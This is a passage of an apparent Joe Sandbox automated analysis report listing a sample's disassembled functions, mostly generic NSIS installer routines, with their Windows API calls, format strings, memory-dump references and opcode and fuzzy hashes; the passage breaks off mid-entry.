                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                    • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                    Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                    Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                    Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: Version
                                                                                                                                                                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                    Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                    Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
